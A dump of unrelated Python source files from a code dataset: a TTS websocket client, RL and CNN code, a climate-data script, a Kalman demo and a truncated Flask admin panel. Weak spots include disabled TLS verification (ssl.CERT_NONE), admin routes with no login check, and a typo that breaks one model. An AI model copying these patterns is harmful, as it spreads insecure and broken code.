base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\n # 将请求的鉴权参数组合为字典\n v = {\n \"authorization\": authorization,\n \"date\": date,\n \"host\": \"ws-api.xfyun.cn\"\n }\n # 拼接鉴权参数,生成url\n url = url + '?' + urlencode(v)\n # print(\"date: \",date)\n # print(\"v: \",v)\n # 此处打印出建立连接时候的url,参考本demo的时候可取消上方打印的注释,比对相同参数时生成的url与自己代码生成的url是否一致\n # print('websocket url :', url)\n return url\n\n\ndef text_byte_num_cut(text, byte_limit):\n split_text_list = []\n single_text = ''\n for char_ in text:\n if len((single_text+char_).encode('utf-8')) >= byte_limit:\n split_text_list.append(single_text)\n single_text = ''\n single_text += char_\n split_text_list.append(single_text)\n return split_text_list\n\n\ndef run_tts(Text, serial_no, input_file_path):\n audio_name_prefix = os.path.basename(os.path.dirname(input_file_path))\n audio_output_path = os.path.join(os.path.dirname(input_file_path), '{}_audio'.format(audio_name_prefix))\n\n if os.path.exists(os.path.join(audio_output_path, '{}-{}.wav'.format(audio_name_prefix, serial_no))):\n return\n\n try:\n os.mkdir(audio_output_path)\n except:\n pass\n\n txt_path = os.path.join(audio_output_path, '{}-{}.txt'.format(audio_name_prefix, serial_no))\n with open(txt_path, 'w', encoding='utf-8') as f:\n f.write(Text)\n\n def on_message(ws, message):\n pcm_path = os.path.join(audio_output_path, '{}-{}.pcm'.format(audio_name_prefix, serial_no))\n # wav_path = os.path.join(audio_output_path, '{}-{}.wav'.format(audio_name_prefix, serial_no))\n try:\n message = json.loads(message)\n code = message[\"code\"]\n sid = message[\"sid\"]\n audio = message[\"data\"][\"audio\"]\n audio = base64.b64decode(audio)\n status = message[\"data\"][\"status\"]\n if status == 2:\n print(\"ws is closed\")\n ws.close()\n if code != 0:\n errMsg = message[\"message\"]\n print(\"sid:%s call error:%s code is:%s\" % (sid, errMsg, code))\n else:\n with open(pcm_path, 'ab') as f:\n f.write(audio)\n except Exception as e:\n print(\"receive msg,but parse exception:\", e)\n print(traceback.format_exc())\n\n def on_error(ws, error):\n print(\"### error:\", error)\n\n def on_close(ws):\n print(\"### closed ###\")\n\n def on_open(ws):\n def run(*args):\n d = {\"common\": wsParam.CommonArgs,\n \"business\": wsParam.BusinessArgs,\n \"data\": wsParam.Data,\n }\n d = json.dumps(d)\n # print(\"------>开始发送文本数据\")\n ws.send(d)\n # if os.path.exists('./demo.pcm'):\n # os.remove('./demo.pcm')\n\n thread.start_new_thread(run, ())\n\n wsParam = Ws_Param(\n APPID=decrypt_express(os.getenv(CommonConstants.PW), CommonConstants.TTS_APPID),\n APIKey=decrypt_express(os.getenv(CommonConstants.PW), CommonConstants.TTS_APIKEY),\n APISecret=decrypt_express(os.getenv(CommonConstants.PW), CommonConstants.TTS_APISECRET),\n Text=Text\n )\n websocket.enableTrace(False)\n wsUrl = wsParam.create_url()\n ws = websocket.WebSocketApp(wsUrl, on_message=on_message, on_error=on_error, on_close=on_close)\n ws.on_open = on_open\n ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\n\n for pcm_file in [os.path.join(audio_output_path, i) for i in os.listdir(audio_output_path) if os.path.splitext(i)[-1] == '.pcm']:\n pcm2wav(pcm_file)\n os.remove(pcm_file)\n\n\ndef tts_run_total(txt_file_path):\n # 待合成文本内容\n with open(txt_file_path, 'r', encoding='utf-8') as f:\n text = f.read().replace('\\n', \"\")\n print('总字数:', len(text))\n text_list = text_byte_num_cut(text, 7998)\n print('分段数:', len(text_list))\n\n for i, text in enumerate(tqdm(text_list), start=1):\n i = str(i).zfill(3)\n run_tts(text, i, txt_file_path)\n\n return os.path.join(os.path.dirname(txt_file_path), '{}_audio'.format(os.path.basename(os.path.dirname(txt_file_path))))\n\n\nif __name__ == \"__main__\":\n tts_run_total(r\"E:\\python\\pdf_convert\\数据\\精要主义 如何应对拥挤不堪的工作与生活\\精要主义 如何应对拥挤不堪的工作与生活 _image_ocr_result.txt\")\n","sub_path":"scripts/tts_ws_python3.py","file_name":"tts_ws_python3.py","file_ext":"py","file_size_in_byte":7289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"576390210","text":"import threading, time\n\n\nclass MyThread( threading.Thread ):\n\n def __init__(self, name, T):\n\n super( MyThread, self ).__init__()\n self.time = T\n self.name = name\n\n def run(self):\n time.sleep( self.time )\n print( '%s have sleep %s' % (self.name, self.time) ,threading.current_thread(),threading.active_count())\n\n#\n# t1 = MyThread( 'hugh', 3 )\n#\n# t2 = MyThread( 'wong', 1 )\n#\n# t1.start()\n# t2.start()\n\nsttime = time.time()\n\nt_obj = []\n\nfor i in range(1 , 5000):\n\n t = MyThread('t-%s'%i,1)\n t.setDaemon(True) # 当前线程设置为守护线程\n t.start()\n t_obj.append(t)\n\n#\n# for i in t_obj:\n# i.join()\n\nendtime = time.time()\nprint(threading.current_thread())\nprint('total time is : ', endtime-sttime)\n\n\n","sub_path":"Week9/thread_ex1.py","file_name":"thread_ex1.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"126874115","text":"from agents.utils import *\n\nclass DDPGAgent():\n \"\"\"An implementation of a DDPG agent.\"\"\"\n \n def __init__(self, state_size, action_size, \n local_actor_network, local_critic_network, \n target_actor_network, target_critic_network, \n utilities, config, random_seed=1):\n \"\"\"DDPGAgent initialization.\n \n Keyword arguments:\n state_size (int): the state's dimensionality\n action_size (int): the number of available actions, \n or the dimensionality of the action vector\n local_actor_network (nn.Module): the local actor network\n local_critic_network (nn.Module): the local critic network\n target_actor_network (nn.Module): the actor network to optimiza against\n target_critic_network (nn.Module): the critic network to optimiza against\n config (components.Config): a configuration class \n random_seed (int): random seed -- default = 1\n \"\"\"\n # TODO: Make a config class to hold the hyperparams\n self.config = config.config\n self.params = self.config['params'][0]\n self.device = self.config['device']\n\n self.utilities = utilities\n\n self.state_size = state_size\n self.action_size = action_size\n self.seed = random.seed(random_seed)\n\n # actor network\n self.actor_local = local_actor_network.to(self.device)\n self.actor_target = target_actor_network.to(self.device)\n self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=self.params['act_lr'])\n\n # critic network\n self.critic_local = local_critic_network.to(self.device)\n self.critic_target = target_critic_network.to(self.device)\n self.critic_optimizer = optim.Adam(self.critic_local.parameters(), lr=self.params['cri_lr'], \n weight_decay=self.params['weight_decay'])\n \n # initial synchronization\n self.utilities.hard_copy(self.critic_local, self.critic_target)\n self.utilities.hard_copy(self.actor_local, self.actor_target)\n\n # initialize noise process to help with exploration\n self.noise = OUNoise(action_size, random_seed)\n\n # initialize replay memory\n self.memory = ReplayBuffer(action_size, self.params['buffer_size'], \n self.params['batch_size'], self.device, random_seed)\n \n def step(self, state, action, reward, next_state, done):\n \"\"\"Save experience in replay memory. \n Start the learning process if there are enough elements in memory.\"\"\"\n self.memory.add(state, action, reward, next_state, done)\n\n if len(self.memory) > self.params['batch_size']:\n experiences = self.memory.sample()\n self._learn(experiences, self.params['gamma'])\n\n def act(self, state, add_noise=True):\n \"\"\"Returns the best believed actions for a given state, with respect to the current policy.\"\"\"\n state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)\n self.actor_local.eval() # switch model to evaluation mode\n with torch.no_grad():\n action = self.actor_local(state).cpu().data.numpy()\n self.actor_local.train() # switch back to train mode\n if add_noise: # add noise to the action to encourage exploration\n action += self.noise.sample()\n return np.clip(action, self.params['clip_min'], self.params['clip_max'])\n\n def reset(self):\n \"\"\"Resets the internal state of the noise to the mean.\"\"\"\n self.noise.reset()\n\n def _learn(self, experiences, gamma):\n \"\"\"Update policy and value parameters using given batch of experience tuples.\n\n Keyword arguments:\n experiences (Tuple): a tuple of experience tuples \n gamma (float): the return discount factor\n \"\"\"\n states, actions, rewards, next_states, dones = experiences\n\n # first update the critic\n # get the next actions, given the next states\n actions_next = self.actor_target(next_states)\n # estimate the Q of next states and actions\n Q_targets_next = self.critic_target(next_states, actions_next)\n # estimate Q targets for next states\n Q_targets = rewards + (gamma * Q_targets_next * (1.0 - dones))\n # estimate the expected Q value\n Q_expected = self.critic_local(states, actions)\n # compute citic loss \n critic_loss = F.mse_loss(Q_expected, Q_targets)\n # minimise loss \n self.critic_optimizer.zero_grad() \n critic_loss.backward() \n self.critic_optimizer.step() \n\n # then update the actor\n # compute actor loss\n actions_pred = self.actor_local(states)\n actor_loss = -self.critic_local(states, actions_pred).mean()\n # minimize the loss\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # aply soft updates to the target networks\n self.utilities.soft_update(self.critic_local, self.critic_target, self.params['tau'])\n self.utilities.soft_update(self.actor_local, self.actor_target, self.params['tau'])\n ","sub_path":"drl/agents/ddpg_agent.py","file_name":"ddpg_agent.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"371536386","text":"#!/usr/bin/python\n\n#############################################################\n# Script Name: climate_records.py\n# Version 2.1\n# Author: Aaron Treadway (aaron.treadway@noaa.gov)\n#\n# 10/15/14 - Started from Test Scripts from xmACIS Web \n# Services\n# 10/16/14 - Edited Initially by Aaron Treadway (AT)\n# 10/17/14 - elems and output added by Keith Eggleston (KE)\n# 10/18/14 - For loops and output changed (AT)\n# 10/18/14 - Changed the output from python shell to .txt \n# file (AT)\n# 10/19/14 - Changed the output to table form, changed \n# dictionaries\n# 10/24/14 - Added Comments...posted to Github\n#\n# Purpose: To have all of the Almanac information for the \n# day in one place for various climate sites\n#\n############################################################\n\n#import Python libraries\nimport urllib, urllib2\nimport datetime\nfrom time import gmtime, strftime\n\ntry :\n import json\nexcept ImportError :\n import simplejson as json\n \n#set up today and yesterday \n#could easily add a tomorrow also\ntoday = datetime.date.today()\ntime = datetime.time()\none_day = datetime.timedelta(days=1)\nyesterday = today - one_day\n\ntoday_month = today.month\ntoday_day = today.day\ntoday_climate = str(today_month) + \"-\" + str(today_day)\n\nyesterday_month = yesterday.month\nyesterday_day = yesterday.day\nyesterday_climate = str(yesterday_month) + \"-\" + str(yesterday_day)\n\n# -- EDIT THIS -- EDIT THIS -- EDIT THIS --\n#Choose sites using info in table 1 from:\n#http://www.rcc-acis.org/docs_webservices.html\n#Can have as many or as few as needed\nstations = [\"AUSthr\", \"ATTthr\", \"SATthr\", \"DRTthr\"]\n\n#creates .txt output file\n#writes header\nfile = open(\"climate_records.txt\", \"w\")\nfile.write(\"Temperature and Precipitation Record Information\")\nfile.write(\" \")\nfile.write(\" \"+ \"\\n\")\n\n#for loop that loops through all the information for the stations. \nfor site in stations:\n#Today's Temperature ---------------------------------------\n#calls ACIS Web Services Database\n\tinput_dictTt = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\t\t\t\t\n{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\t\t\t\t\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\t\t\t\t{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Today's Temperature Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictTt)})\n\treq = urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\ttodayt_dic_site = json.loads(results)\n\n#Yesterdays's Temperature ----------------------------------\n#calls ACIS Web Services Database\n\tinput_dictYt = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\t\t\t\t\n{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\t\t\t\t\n\t\t\t\t{\"name\":\"maxt\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"min\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\t\t\t\t{\"name\":\"mint\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Yesterdays's Temperature Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictYt)})\n\treq = urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\tyesterdayt_dic_site = json.loads(results)\n\t\n#Todays's Precipitation ------------------------------------\n#calls ACIS Web Services Database\n\tinput_dictTp = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"pcpn\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n{\"name\":\"snow\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n{\"name\":\"snwd\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",today_climate,today_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Today's Precipitation Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictTp)})\n\treq = urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\ttodayp_dic_site = json.loads(results)\n\t\n\n#Yesterdays's Precipitation --------------------------------\n#calls ACIS Web Services Database\n\tinput_dictYp = {\n\t\t\t\"sid\": site,\n\t\t\t\"sdate\": \"por\",\n\t\t\t\"edate\": \"por\",\n\t\t\t\"meta\": [\"name\", \"state\"],\n\t\t\t\"elems\":[\n\t\t\t\t{\"name\":\"pcpn\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n{\"name\":\"snow\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n{\"name\":\"snwd\",\"interval\":\"dly\",\"duration\":\"dly\",\"smry\":{\"reduce\":\"max\",\"add\":\"date\"},\"smry_only\":1,\"groupby\":[\"year\",yesterday_climate,yesterday_climate]},\n\n\t\t\t]\n\t\t}\n\n#Creates Yesterdays's Precipitation Output dictionary\n\tparams = urllib.urlencode({'params':json.dumps(input_dictYp)})\n\treq = urllib2.Request('http://data.rcc-acis.org/StnData', params, {'Accept':'application/json'})\n\tresponse = urllib2.urlopen(req)\n\tresults = response.read()\n\tyesterdayp_dic_site = json.loads(results)\n\n#Output in table form. Included in the Loop\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| \" + site + \" | Record Max | Record Min | Record Low Max | Record High Min |\\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Today | \" + todayt_dic_site[\"smry\"][0][0][0] + \" // \" + todayt_dic_site[\"smry\"][0][0][1] + \" | \" + todayt_dic_site[\"smry\"][1][0][0] + \" // \" + todayt_dic_site[\"smry\"][1][0][1] + \" | \" + todayt_dic_site[\"smry\"][2][0][0] + \" // \" + todayt_dic_site[\"smry\"][2][0][1] + \" | \" + todayt_dic_site[\"smry\"][3][0][0] + \" // \" + todayt_dic_site[\"smry\"][3][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Yesterday | \" + yesterdayt_dic_site[\"smry\"][0][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][0][0][1] + \" | \" + yesterdayt_dic_site[\"smry\"][1][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][1][0][1] + \" | \" + yesterdayt_dic_site[\"smry\"][2][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][2][0][1] + \" | \" + yesterdayt_dic_site[\"smry\"][3][0][0] + \" // \" + yesterdayt_dic_site[\"smry\"][3][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| \" + site + \" | Record Rainfall | Record Snowfall | Record Snow Depth |\\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Today | \" + todayp_dic_site[\"smry\"][0][0][0] + \" // \" + todayp_dic_site[\"smry\"][0][0][1] + \" | \" + todayp_dic_site[\"smry\"][1][0][0] + \" // \" + todayp_dic_site[\"smry\"][1][0][1] + \" | \" + todayp_dic_site[\"smry\"][2][0][0] + \" // \" + todayp_dic_site[\"smry\"][2][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"| Yesterday | \" + yesterdayp_dic_site[\"smry\"][0][0][0] + \" // \" + yesterdayp_dic_site[\"smry\"][0][0][1] + \" | \" + yesterdayp_dic_site[\"smry\"][1][0][0] + \" // \" + yesterdayp_dic_site[\"smry\"][1][0][1] + \" | \" + yesterdayp_dic_site[\"smry\"][2][0][0] + \" // \" + yesterdayp_dic_site[\"smry\"][2][0][1] + \" | \\n\")\n\tfile.write(\"-------------------------------------------------------------------------------------------\\n\")\n\tfile.write(\"\\n\")\n\t \n#prints the time the script ran to confirm.\nfile.write(\"Updated:\"+strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n#closes the .txt file\nfile.close\n","sub_path":"climate_records.py","file_name":"climate_records.py","file_ext":"py","file_size_in_byte":8865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"305150506","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torchvision \nimport torch.nn as nn\n\nclass model(nn.Module):\n def __init__(self):\n super(model, self).__init__()\n self.conv1_1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=5, stride=2, padding=0)\n self.relu_conv1_1 = nn.PReLU()\n self.pool1 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv2_1 = nn.Conv2d(in_channels=8, out_channels=16, kernel_size=3, stride=1, padding=0)\n self.relu_conv2_1 = nn.PReLU()\n self.conv2_2 = nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=1, padding=0)\n self.relu_conv2_2 = nn.PReLU()\n self.pool2 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv3_1 = nn.Conv2d(in_channels=16, out_channels=24, kernel_size=3, stride=1, padding=0)\n self.relu_conv3_1 = nn.PReLU()\n self.conv3_2 = nn.Conv2d(in_channels=24,out_channels=24, kernel_size=3, stride=1, padding=0)\n self.relu_conv3_2 = nn.PReLU()\n self.pool3 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv4_1 = nn.Conv2d(in_channels=24, out_channels=40, kernel_size=3, stride=1, padding=1)\n self.relu_conv4_1 = nn.PReLU()\n self.conv4_2 = nn.Conv2d(in_channels=40, out_channels=80, kernel_size=3, stride=1, padding=1)\n self.relu_conv4_2 = nn.PReLU()\n self.ip1 = nn.Linear(4*4*80, 128)\n self.relu_ip1 = nn.PReLU()\n self.ip2 = nn.Linear(128, 128)\n self.relu_ip2 = nn.PReLU()\n self.ip3 = nn.Linear(128, 42)\n \n def forward(self, x):\n x = self.conv1_1(x)\n x = self.relu_conv1_1(x)\n x = self.pool1(x)\n x = self.conv2_1(x)\n x = self.relu_conv2_1(x)\n x = self.conv2_2(x)\n x = self.relu_conv2_2(x)\n x = self.pool2(x)\n x = self.conv3_1(x)\n x = self.relu_conv3_1(x)\n x = self.conv3_2(x)\n x = self.relu_conv3_2(x)\n x = self.pool3(x)\n x = self.conv4_1(x)\n x = self.relu_conv4_1(x)\n x = self.conv4_2(x)\n x = self.re.u_conv4_2(x)\n x = self.ip1(x)\n x = self.relu_ip1(x)\n x = self.ip2(x)\n x = self.relu_ip2(x)\n x = self.ip3(x)\n return x\n\nclass LeNet(nn.Module):\n def __init__(self, num_classes):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5, stride=1, padding=2)\n self.relu1 = nn.ReLU()\n self.pooling1 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv2 = nn.Conv2d(in_channels=6, out_channels=16, kernel_size=5, stride=1)\n self.relu2 = nn.ReLU()\n self.pooling2 = nn.AvgPool2d(kernel_size=2, stride=2)\n self.conv3 = nn.Conv2d(in_channels=16, out_channels=120, kernel_size=5, stride=1)\n self.relu3 = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.fc2 = nn.Linear(84, num_classes)\n \n def forward(self, x):\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.pooling1(x)\n x = self.conv2(x)\n x = self.relu2(x)\n x = self.pooling2(x)\n x = self.conv3(x)\n x = self.relu3(x)\n x = x.view(x.size()[0], -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\n \n\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"375442520","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n def __init__(self):\r\n self.res = []\r\n\r\n def combinationSum(self, candidates: List[int], target: int):\r\n one_ans = []\r\n start = 0\r\n candidates.sort()\r\n self.combination_sum_memo(candidates, target, start, one_ans)\r\n return self.res\r\n\r\n def combination_sum_memo(self, candidates: List[int], target: int, start: int, one_ans: List[int]):\r\n if target == 0:\r\n self.res.append(one_ans[:])\r\n return\r\n for i in range(start, len(candidates)):\r\n if candidates[i] > target:\r\n return\r\n one_ans.append(candidates[i])\r\n self.combination_sum_memo(candidates, target - candidates[i], i, one_ans)\r\n one_ans.pop()\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n sol2 = Solution()\r\n print(sol2.combinationSum([2, 3, 6, 7], 7))\r\n print(sol2.combinationSum([2, 3, 5], 8))\r\n print(sol2.combinationSum([8, 7, 4, 3], 11))\r\n","sub_path":"backtracking/39 combinationSum.py","file_name":"39 combinationSum.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"627004176","text":"import win32api\nimport numpy as np\nfrom filterpy.common import kinematic_kf\nfrom filterpy.kalman import ExtendedKalmanFilter\nimport cv2\nimport time\nimport filterpy as fp\nfrom filterpy.kalman import IMMEstimator\nnp.set_printoptions(suppress=True)\norder=1\nkf1 = kinematic_kf(dim=2, order=order)\nkf2 = ExtendedKalmanFilter(4, 2)\n# do some settings of x, R, P etc. here, I'll just use the defaults\nkf2.Q *= 0 # no prediction error in second filter\nfilters = [kf1, kf2]\nmu = [0.5, 0.5] # each filter is equally likely at the start\ntrans = np.array([[0.97, 0.03], [0.03, 0.97]])\nimm = IMMEstimator(filters, mu, trans)\n\nbg_image = cv2.imread('bg.png') # 500,1000\ncv2.imshow('KalmanFilterDemo', bg_image)\ncv2.moveWindow(\"KalmanFilterDemo\", 0, 0)\nwindow_ul = (8, 30) # x,y\nboxhsize = (20, 10)\nlastul=(0,0)\nlastbr=(0,0)\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nvideof=cv2.VideoWriter('video.avi',fourcc,1,(1000,500))\n\nwhile True:\n start_time = time.time() # start time of the loop\n frame = bg_image.copy()\n x, y = win32api.GetCursorPos()\n x = x - window_ul[0]\n y = y - window_ul[1]\n cv2.rectangle(frame, (x - boxhsize[0], y - boxhsize[1]), (x + boxhsize[0], y + boxhsize[1]), (0, 255, 0), 3)\n\n z = np.array([[x], [y]])\n imm.update(z)\n imm.predict()\n\n print(imm.x.T)\n # if order==1:\n # xp=imm.x_prior[0]\n # yp=imm.x_prior[2]\n # elif order==2:\n # xp=imm.x_prior[0]\n # yp=imm.x_prior[3]\n new_vals=imm.x.T[0]\n if order==1:\n xp=int(new_vals[0])\n yp=int(new_vals[2])\n elif order==2:\n xp=int(new_vals[0])\n yp=int(new_vals[3])\n for item in imm.x_prior:\n print(item[0],' ',end='')\n #cv2.rectangle(frame, lastul, lastbr, (255, 0, 0), 1)\n\n print()\n lastul=(xp - boxhsize[0], yp - boxhsize[1])\n lastbr=(xp + boxhsize[0], yp + boxhsize[1])\n cv2.rectangle(frame, (xp - boxhsize[0], yp - boxhsize[1]), (xp + boxhsize[0], yp + boxhsize[1]), (255, 0, 0), 1)\n cv2.imshow('KalmanFilterDemo', frame)\n videof.write(frame)\n #print(x, ' ', y)\n k = cv2.waitKey(100) & 0xff\n if k == 27: break\n print(\"FPS: \", 1.0 / (time.time() - start_time)) # FPS = 1 / time to process loop","sub_path":"EKFTest.py","file_name":"EKFTest.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"631423673","text":"# -*- coding:utf8 -*-\n\nimport datetime\nimport copy\n\nfrom flask import render_template, redirect, url_for, flash, request\nfrom sqlalchemy.sql import func\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom . import manage\nfrom .. import db\nfrom ..models import User, MainCarousel, MainEntrance, MainNews, DesignCarousel, DesignNews, DesignProject, Event, \\\n EventMember, Contact, HotWord, Other, AppleOther\n\nfrom .forms import LoginForm, ChangePasswordForm, AddNewsForm\n\n\n@manage.route('/')\ndef index():\n return render_template('admin/index.html')\n\n\n@manage.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n # users = User.query.order_by(User.id).all()\n # for u in users:\n # print u.username\n # u.password = '111111'\n # print u.password_hash\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is not None and user.verify_password(form.password.data):\n login_user(user, 1)\n return redirect(request.args.get('next') or url_for('manage.index'))\n flash(u'用户名 或 密码 错误')\n\n return render_template('admin/login.html', form=form)\n\n\n@manage.route('/logout')\n@login_required\ndef logout():\n logout_user()\n flash('You have been logged out.')\n return redirect(url_for('admin.login'))\n\n\n@manage.route('/change-password', methods=['GET', 'POST'])\n@login_required\ndef change_password():\n form = ChangePasswordForm()\n if form.validate_on_submit():\n if current_user.verify_password(form.old_password.data):\n current_user.password = form.password.data\n db.session.add(current_user)\n flash('Your password has been updated.')\n return redirect(url_for('manage.login'))\n else:\n flash('Invalid password.')\n return render_template(\"admin/change_password.html\", form=form)\n\n\n@manage.route('/main_carousel')\ndef main_carousel():\n carousels = MainCarousel.query.order_by(MainCarousel.sort.asc()).all()\n return render_template(\"admin/main_carousel.html\", carousels=carousels)\n\n\n@manage.route('/main_carousel/add', methods=['GET', 'POST'])\ndef main_carousel_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n slider = MainCarousel.query.get(id)\n\n return render_template(\"admin/main_carousel_detail.html\", slider=slider)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n web_cover = request.values.get('web_cover', '')\n wap_cover = request.values.get('wap_cover', '')\n\n slider = MainCarousel.query.get(id)\n if not slider:\n slider = MainCarousel()\n\n slider.ch_title = ch_title\n slider.en_title = en_title\n slider.web_cover = web_cover\n slider.wap_cover = wap_cover\n db.session.add(slider)\n\n return redirect(url_for('manage.main_carousel'))\n\n\n@manage.route('/main_carousel//')\ndef main_carousel_state(id, state):\n slider = MainCarousel.query.get(id)\n slider.state = state\n\n if state == 0:\n flash(u'轮播图:<%s>已隐藏' % slider.ch_title)\n elif state == 1:\n\n flash(u'轮播图:<%s>已外显' % slider.ch_title)\n\n return redirect(url_for('manage.main_carousel'))\n\n\n@manage.route('/main_carousel//sort/')\ndef main_carousel_sort(id, move):\n slider = MainCarousel.query.get(id)\n\n if (slider.sort == 1 and move == 'up') or (slider.sort == 4 and move == 'down'):\n pass\n else:\n if move == 'up':\n tmp_s = MainCarousel.query.filter_by(sort=slider.sort - 1).first()\n\n slider.sort -= 1\n tmp_s.sort += 1\n else:\n tmp_s = MainCarousel.query.filter_by(sort=slider.sort + 1).first()\n\n slider.sort += 1\n tmp_s.sort -= 1\n\n db.session.add(slider)\n db.session.add(tmp_s)\n 